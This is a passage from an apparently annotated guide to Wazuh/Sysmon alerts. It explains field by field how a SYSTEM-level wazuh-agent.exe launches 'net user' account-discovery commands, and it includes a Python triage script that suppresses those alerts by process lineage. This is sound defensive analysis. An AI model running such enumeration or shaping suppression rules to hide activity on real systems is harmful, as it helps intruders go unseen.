data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe The 32-bit net1.exe. net.exe is a thin launcher that passes `user` and most other subcommands to net1.exe with the same arguments, so every `net user` yields two EID 1 events.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) File version from the PE version resource.
data.win.eventdata.description: Net Command Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource.
data.win.eventdata.originalFileName: net1.exe Compiled-in file name; matches the image name.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user guest The same query, re-issued by net.exe. The command line names system32 while the image is under SysWOW64: WOW64 redirection again, because the whole chain is 32-bit. Rule 92039 fires on this event as well as on net.exe, which is why rule.firedtimes advanced from 3 to 4 for one command.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Inherited from net.exe, which inherited it from the Wazuh agent.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Runs as LocalSystem, like its parent.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Same SYSTEM logon session as the parent.
data.win.eventdata.logonId: 0x3e7 The well-known SYSTEM logon session (999).
data.win.eventdata.terminalSessionId: 0 Session 0, services; no interactive user.
data.win.eventdata.integrityLevel: System System integrity.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 SHA256 of SysWOW64\net1.exe on disk.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc9-680a-b80a-000000000e00} Equals the processGuid of the net.exe alert above, which in turn was spawned by wazuh-agent.exe. Joining on GUIDs is what lets a triage rule carry the parent's verdict down to this event.
data.win.eventdata.parentProcessId: 11604 PID of the net.exe that launched net1.exe; matches the previous alert's processId.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe The launcher net.exe.
data.win.eventdata.parentCommandLine: net user guest The original command as typed by the agent; net1.exe received it verbatim.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM LocalSystem throughout the chain.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
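Two of the alerts above are better explained by their parents than by their rule descriptions: the EID 11 file creation is PowerShell's start-up script-policy probe, and the net.exe commands were started by wazuh-agent.exe running as SYSTEM. The following is an added example, not Wazuh code and not from the page's author: a triage pass over condensed copies of those alerts (fields taken from the eventdata above, plus one constructed counter-example) that uses Sysmon's processGuid/parentProcessGuid links so that net1.exe inherits the verdict of the net.exe that launched it. The verdict labels are this example's own. That the agent's own configuration checks are what run these net commands is an assumption to confirm against the agent's SCA policy, which is why the verdict names the parent image rather than asserting intent.

```python
"""Parent-aware triage of Sysmon EID 1 / EID 11 alerts.

Added example, not part of Wazuh or of this page. Field names follow the
data.win.eventdata.* keys shown above; verdict labels are this example's own.
"""
import re
from typing import Dict, List

INVESTIGATE = 'investigate'
BENIGN_PROBE = 'benign: PowerShell start-up script-policy probe'
SUPPRESS_AGENT_CHILD = 'suppress: child of wazuh-agent.exe (agent-initiated check)'

# PowerShell writes __PSScriptPolicyTest_<random>.ps1/.psm1 to %TEMP% at start-up
# to test whether AppLocker/WDAC script enforcement applies, then deletes it.
PS_POLICY_PROBE = re.compile(r'\\__PSScriptPolicyTest_[^\\]+\.psm?1$', re.I)
POWERSHELL_IMAGES = {'powershell.exe', 'pwsh.exe'}
NET_IMAGES = {'net.exe', 'net1.exe'}
AGENT_IMAGE = 'wazuh-agent.exe'   # assumption: the agent's checks are the only SYSTEM parent we accept
SYSTEM_USER = r'NT AUTHORITY\SYSTEM'

# Condensed copies of the alerts on this page, plus one constructed counter-example.
ALERTS: List[dict] = [
    {'id': '1745534215.999485', 'eventID': 11,
     'image': r'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe',
     'targetFilename': r'C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mqh0ir2i.w0v.ps1',
     'user': r'Attacker\Attcker1', 'processGuid': '{94294ddc-bcc6-680a-b30a-000000000e00}'},
    {'id': '1745534215.1002249', 'eventID': 1,
     'image': r'C:\Windows\SysWOW64\net.exe', 'commandLine': 'net user guest',
     'user': SYSTEM_USER, 'processGuid': '{94294ddc-bcc9-680a-b80a-000000000e00}',
     'parentProcessGuid': '{94294ddc-ea88-67fe-4900-000000000e00}',
     'parentImage': r'C:\Program Files (x86)\ossec-agent\wazuh-agent.exe'},
    {'id': '1745534215.1007500', 'eventID': 1,
     'image': r'C:\Windows\SysWOW64\net1.exe', 'commandLine': r'C:\WINDOWS\system32\net1 user guest',
     'user': SYSTEM_USER, 'processGuid': '{94294ddc-bcca-680a-ba0a-000000000e00}',
     'parentProcessGuid': '{94294ddc-bcc9-680a-b80a-000000000e00}',
     'parentImage': r'C:\Windows\SysWOW64\net.exe'},
    # Constructed: same command, but an interactive user with a cmd.exe parent.
    {'id': 'constructed-1', 'eventID': 1,
     'image': r'C:\Windows\System32\net.exe', 'commandLine': 'net user administrator',
     'user': r'Attacker\Attcker1', 'processGuid': '{00000000-0000-0000-0000-000000000001}',
     'parentProcessGuid': '{00000000-0000-0000-0000-000000000002}',
     'parentImage': r'C:\Windows\System32\cmd.exe'},
]


def basename(path: str) -> str:
    """Last path component, lower-cased; tolerates forward slashes."""
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def direct_verdict(a: dict) -> str:
    """Verdict from the alert's own fields only."""
    image = basename(a.get('image', ''))
    if (a.get('eventID') == 11 and image in POWERSHELL_IMAGES
            and PS_POLICY_PROBE.search(a.get('targetFilename', ''))):
        return BENIGN_PROBE
    if (a.get('eventID') == 1 and image in NET_IMAGES
            and a.get('user', '').upper() == SYSTEM_USER
            and basename(a.get('parentImage', '')) == AGENT_IMAGE):
        return SUPPRESS_AGENT_CHILD
    return INVESTIGATE


def triage(alerts: List[dict]) -> Dict[str, str]:
    """Map alert id -> verdict. Pass 1 judges each alert alone; pass 2 lets a
    still-open net.exe/net1.exe child inherit a suppression from its parent by
    joining parentProcessGuid to processGuid (PIDs are reusable, GUIDs are not)."""
    verdicts = {a['id']: direct_verdict(a) for a in alerts}
    by_guid = {a['processGuid']: verdicts[a['id']] for a in alerts}
    for a in alerts:
        parent = by_guid.get(a.get('parentProcessGuid', ''))
        if (verdicts[a['id']] == INVESTIGATE and parent and parent.startswith('suppress')
                and basename(a.get('image', '')) in NET_IMAGES
                and a.get('user', '').upper() == SYSTEM_USER):
            verdicts[a['id']] = parent + ' (inherited via parentProcessGuid)'
    return verdicts


if __name__ == '__main__':
    for alert_id, verdict in triage(ALERTS).items():
        print(f'{alert_id}: {verdict}')
```

The inheritance step is what keeps the net1.exe alert from slipping through: its own parent is net.exe, which says nothing by itself, so the verdict has to come from one level up. The same join works the other way round for the PowerShell alerts, where the probe file's processGuid points at the cradle process and makes the benign EID 11 a pivot rather than noise.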
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert's headline. Third hit in 0.3 s from the same parent: the account being queried changed from guest to administrator.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.1012577 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event: Sysmon.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID, identical on every host.
data.win.system.eventID: 1 Sysmon event ID 1 = Process Create.
data.win.system.version: 5 Event template version for EID 1.
data.win.system.level: 4 Informational; Sysmon logs all its events at this level.
data.win.system.task: 1 Mirrors the Sysmon event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.2509434Z Log write time; the process start is stamped in eventdata.utcTime (22:35:54.246), 0.3 s after the guest query.
data.win.system.eventRecordID: 282303 Three records after the net1.exe alert's 282300; expect a matching net1.exe event a few records later.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of net.exe.
data.win.system.threadID: 4740 Thread of the Sysmon service; same caveat.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational The event log the record lives in.
data.win.system.computer: Attacker NetBIOS name of the logging host; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.246
ProcessGuid: {94294ddc-bcca-680a-bb0a-000000000e00}
ProcessId: 4340
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" Rendered text of the Sysmon event; the parsed copy of each field is in data.win.eventdata.* below.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.246 Sysmon's timestamp of the process start (UTC); 0.3 s after the guest query from the same parent.
data.win.eventdata.processGuid: {94294ddc-bcca-680a-bb0a-000000000e00} GUID of this net.exe instance.
data.win.eventdata.processId: 4340 Windows PID of this net.exe.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe The 32-bit net.exe again, consistent with the 32-bit parent.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) File version from the PE version resource; identical to the earlier net.exe event.
data.win.eventdata.description: Net Command Description string from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource.
data.win.eventdata.originalFileName: net.exe Compiled-in file name; matches the image name.
data.win.eventdata.commandLine: net user administrator Queries the built-in Administrator account (status, last logon, group membership). Same parent and timing as the guest query: one process walking a short list of accounts, which is what a configuration check looks like; an intruder enumerating accounts more often runs `net user` with no name, or `net localgroup administrators`.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ The Wazuh agent's install directory, inherited from the parent.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Runs as LocalSystem.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Same SYSTEM logon session as the earlier net.exe events.
data.win.eventdata.logonId: 0x3e7 The well-known SYSTEM logon session (999).
data.win.eventdata.terminalSessionId: 0 Session 0, services; no interactive user.
data.win.eventdata.integrityLevel: System System integrity.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 Same SHA256 as the earlier net.exe event: same binary on disk.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} Same parent GUID as the guest query: the one wazuh-agent.exe instance issued both.
data.win.eventdata.parentProcessId: 3244 Same parent PID as the guest query.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534216.1017856 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.3699637Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282306 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.361
ProcessGuid: {94294ddc-bcca-680a-bd0a-000000000e00}
ProcessId: 15012
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcca-680a-bb0a-000000000e00}
ParentProcessId: 4340
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user administrator
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.361 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcca-680a-bd0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcca-680a-bb0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4340 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534216.1022997 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.4155645Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282309 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.411
ProcessGuid: {94294ddc-bcca-680a-be0a-000000000e00}
ProcessId: 4344
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.411 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcca-680a-be0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4344 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534216.1028244 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.6519336Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282313 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.645
ProcessGuid: {94294ddc-bcca-680a-c00a-000000000e00}
ProcessId: 8816
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcca-680a-be0a-000000000e00}
ParentProcessId: 4344
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user guest
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.645 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
